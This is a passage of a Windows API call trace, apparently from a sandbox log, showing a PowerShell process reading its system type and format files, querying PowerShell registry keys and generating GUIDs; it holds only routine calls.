	[0747.675] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.675] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.676] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.676] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.676] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.677] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.677] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.677] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.678] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.678] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.678] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.679] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.679] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.679] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.680] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.685] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0748.922] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0748.922] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0748.923] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0748.923] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0748.923] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0748.923] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0748.924] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0748.924] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1b4, lpOverlapped=0x0) returned 1
	[0748.924] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x0, lpOverlapped=0x0) returned 1
	[0748.924] CloseHandle (hObject=0x314) returned 1
	[0748.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0748.925] SetErrorMode (uMode=0x1) returned 0x1
	[0748.925] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d340 | out: lpFileInformation=0x20d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0748.925] SetErrorMode (uMode=0x1) returned 0x1
	[0748.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0748.925] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d428 | out: phkResult=0x20d428*=0x314) returned 0x0
	[0748.925] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d3ac, lpData=0x0, lpcbData=0x20d3a8*=0x0 | out: lpType=0x20d3ac*=0x1, lpData=0x0, lpcbData=0x20d3a8*=0x56) returned 0x0
	[0748.925] CoTaskMemAlloc (cb=0x5a) returned 0x1b856120
	[0748.925] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d37c, lpData=0x1b856120, lpcbData=0x20d378*=0x56 | out: lpType=0x20d37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d378*=0x56) returned 0x0
	[0748.926] CoTaskMemFree (pv=0x1b856120) 
	[0748.926] RegCloseKey (hKey=0x314) returned 0x0
	[0748.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0748.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0757.165] VirtualQuery (in: lpAddress=0x20c110, lpBuffer=0x20cfd0, dwLength=0x30 | out: lpBuffer=0x20cfd0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0757.180] VirtualQuery (in: lpAddress=0x20c110, lpBuffer=0x20cfd0, dwLength=0x30 | out: lpBuffer=0x20cfd0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0759.772] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0759.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.772] CoTaskMemFree (pv=0x43e4f0) 
	[0761.105] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d5c8 | out: phkResult=0x20d5c8*=0x2f8) returned 0x0
	[0761.105] RegQueryValueExW (in: hKey=0x2f8, lpValueName="path", lpReserved=0x0, lpType=0x20d5dc, lpData=0x0, lpcbData=0x20d5d8*=0x0 | out: lpType=0x20d5dc*=0x1, lpData=0x0, lpcbData=0x20d5d8*=0x74) returned 0x0
	[0761.105] RegQueryValueExW (in: hKey=0x2f8, lpValueName="path", lpReserved=0x0, lpType=0x20d54c, lpData=0x0, lpcbData=0x20d548*=0x0 | out: lpType=0x20d54c*=0x1, lpData=0x0, lpcbData=0x20d548*=0x74) returned 0x0
	[0761.105] CoTaskMemAlloc (cb=0x78) returned 0x483220
	[0761.105] RegQueryValueExW (in: hKey=0x2f8, lpValueName="path", lpReserved=0x0, lpType=0x20d51c, lpData=0x483220, lpcbData=0x20d518*=0x74 | out: lpType=0x20d51c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x20d518*=0x74) returned 0x0
	[0761.105] CoTaskMemFree (pv=0x483220) 
	[0761.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x20d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0761.105] SetErrorMode (uMode=0x1) returned 0x1
	[0761.106] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x20d4a0 | out: lpFileInformation=0x20d4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0761.106] SetErrorMode (uMode=0x1) returned 0x1
	[0761.107] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0761.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.107] CoTaskMemFree (pv=0x43e4f0) 
	[0761.116] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0761.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.116] CoTaskMemFree (pv=0x43e4f0) 
	[0761.116] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0761.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.116] CoTaskMemFree (pv=0x43e4f0) 
	[0761.117] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0761.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.117] CoTaskMemFree (pv=0x43e4f0) 
	[0761.117] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0761.117] GetFileType (hFile=0x310) returned 0x1
	[0761.117] SetErrorMode (uMode=0x1) returned 0x1
	[0761.117] GetFileType (hFile=0x310) returned 0x1
	[0761.117] ReadFile (in: hFile=0x310, lpBuffer=0x32ebd48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x32ebd48*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0761.118] ReadFile (in: hFile=0x310, lpBuffer=0x32ebd48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x32ebd48*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0762.378] ReadFile (in: hFile=0x310, lpBuffer=0x32ebd48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x32ebd48*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0762.379] ReadFile (in: hFile=0x310, lpBuffer=0x32ebd48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x32ebd48*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0762.384] ReadFile (in: hFile=0x310, lpBuffer=0x32ebd48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x32ebd48*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0762.384] ReadFile (in: hFile=0x310, lpBuffer=0x32ebd48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x32ebd48*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0762.384] ReadFile (in: hFile=0x310, lpBuffer=0x32ebd48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x32ebd48*, lpNumberOfBytesRead=0x20d138*=0x9e2, lpOverlapped=0x0) returned 1
	[0762.384] ReadFile (in: hFile=0x310, lpBuffer=0x32eb292, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x32eb292*, lpNumberOfBytesRead=0x20d138*=0x0, lpOverlapped=0x0) returned 1
	[0762.384] ReadFile (in: hFile=0x310, lpBuffer=0x32ebd48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x32ebd48*, lpNumberOfBytesRead=0x20d138*=0x0, lpOverlapped=0x0) returned 1
	[0762.385] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d1c8 | out: phkResult=0x20d1c8*=0x310) returned 0x0
	[0762.385] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d14c, lpData=0x0, lpcbData=0x20d148*=0x0 | out: lpType=0x20d14c*=0x1, lpData=0x0, lpcbData=0x20d148*=0x56) returned 0x0
	[0762.385] CoTaskMemAlloc (cb=0x5a) returned 0x1b856120
	[0762.385] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d11c, lpData=0x1b856120, lpcbData=0x20d118*=0x56 | out: lpType=0x20d11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d118*=0x56) returned 0x0
	[0762.385] CoTaskMemFree (pv=0x1b856120) 
	[0762.385] RegCloseKey (hKey=0x310) returned 0x0
	[0762.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0762.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0762.404] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x6f88664d, Data2=0x23d7, Data3=0x4001, Data4=([0]=0x87, [1]=0x41, [2]=0xab, [3]=0xf2, [4]=0x35, [5]=0xe6, [6]=0xea, [7]=0xd2))) returned 0x0
	[0763.359] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x86abea8e, Data2=0x6cbf, Data3=0x4845, Data4=([0]=0xb7, [1]=0x7c, [2]=0xed, [3]=0x28, [4]=0x7f, [5]=0x46, [6]=0x28, [7]=0x71))) returned 0x0
	[0763.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0763.362] SetErrorMode (uMode=0x1) returned 0x1
	[0763.362] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0763.362] GetFileType (hFile=0x310) returned 0x1
	[0763.363] SetErrorMode (uMode=0x1) returned 0x1
	[0763.363] GetFileType (hFile=0x310) returned 0x1
	[0763.363] ReadFile (in: hFile=0x310, lpBuffer=0x33168b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x33168b0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0763.363] ReadFile (in: hFile=0x310, lpBuffer=0x33168b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x33168b0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0763.364] ReadFile (in: hFile=0x310, lpBuffer=0x33168b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x33168b0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0763.366] ReadFile (in: hFile=0x310, lpBuffer=0x33168b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x33168b0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0763.366] ReadFile (in: hFile=0x310, lpBuffer=0x33168b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x33168b0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0763.375] ReadFile (in: hFile=0x310, lpBuffer=0x318a198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x318a198*, lpNumberOfBytesRead=0x20d138*=0xfb2, lpOverlapped=0x0) returned 1
	[0763.375] ReadFile (in: hFile=0x310, lpBuffer=0x31898f2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31898f2*, lpNumberOfBytesRead=0x20d138*=0x0, lpOverlapped=0x0) returned 1
	[0763.375] ReadFile (in: hFile=0x310, lpBuffer=0x318a198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x318a198*, lpNumberOfBytesRead=0x20d138*=0x0, lpOverlapped=0x0) returned 1
	[0763.375] CloseHandle (hObject=0x310) returned 1
	[0763.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0763.375] SetErrorMode (uMode=0x1) returned 0x1
	[0763.376] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d0e0 | out: lpFileInformation=0x20d0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0763.376] SetErrorMode (uMode=0x1) returned 0x1
	[0763.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0763.376] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d1c8 | out: phkResult=0x20d1c8*=0x310) returned 0x0
	[0763.376] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d14c, lpData=0x0, lpcbData=0x20d148*=0x0 | out: lpType=0x20d14c*=0x1, lpData=0x0, lpcbData=0x20d148*=0x56) returned 0x0
	[0763.376] CoTaskMemAlloc (cb=0x5a) returned 0x4f2bd0
	[0763.376] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d11c, lpData=0x4f2bd0, lpcbData=0x20d118*=0x56 | out: lpType=0x20d11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d118*=0x56) returned 0x0
	[0763.376] CoTaskMemFree (pv=0x4f2bd0) 
	[0763.377] RegCloseKey (hKey=0x310) returned 0x0
	[0763.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0763.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0763.378] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x8e21de08, Data2=0xc07e, Data3=0x47ed, Data4=([0]=0x84, [1]=0x8b, [2]=0xd, [3]=0x47, [4]=0x18, [5]=0x5b, [6]=0xab, [7]=0x18))) returned 0x0
	[0763.381] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x5408a3aa, Data2=0x497c, Data3=0x49a5, Data4=([0]=0xb3, [1]=0x73, [2]=0x46, [3]=0x16, [4]=0x6b, [5]=0x48, [6]=0xfd, [7]=0x58))) returned 0x0
	[0763.381] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xa0b4aaa, Data2=0xc9b8, Data3=0x4b09, Data4=([0]=0x89, [1]=0xec, [2]=0xef, [3]=0x66, [4]=0xfa, [5]=0x40, [6]=0x27, [7]=0x45))) returned 0x0
	[0763.381] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x535f361d, Data2=0xa51d, Data3=0x4070, Data4=([0]=0xb1, [1]=0xa4, [2]=0x3f, [3]=0xca, [4]=0xce, [5]=0x8e, [6]=0x7a, [7]=0xb7))) returned 0x0
	[0763.381] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x85eed15, Data2=0x8133, Data3=0x4fa3, Data4=([0]=0x93, [1]=0x5f, [2]=0x31, [3]=0xfd, [4]=0x23, [5]=0x8d, [6]=0xfc, [7]=0x2c))) returned 0x0
	[0763.382] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x9d1168da, Data2=0xf265, Data3=0x4e66, Data4=([0]=0x88, [1]=0xaa, [2]=0x6a, [3]=0x41, [4]=0xf0, [5]=0xac, [6]=0xb1, [7]=0xe0))) returned 0x0
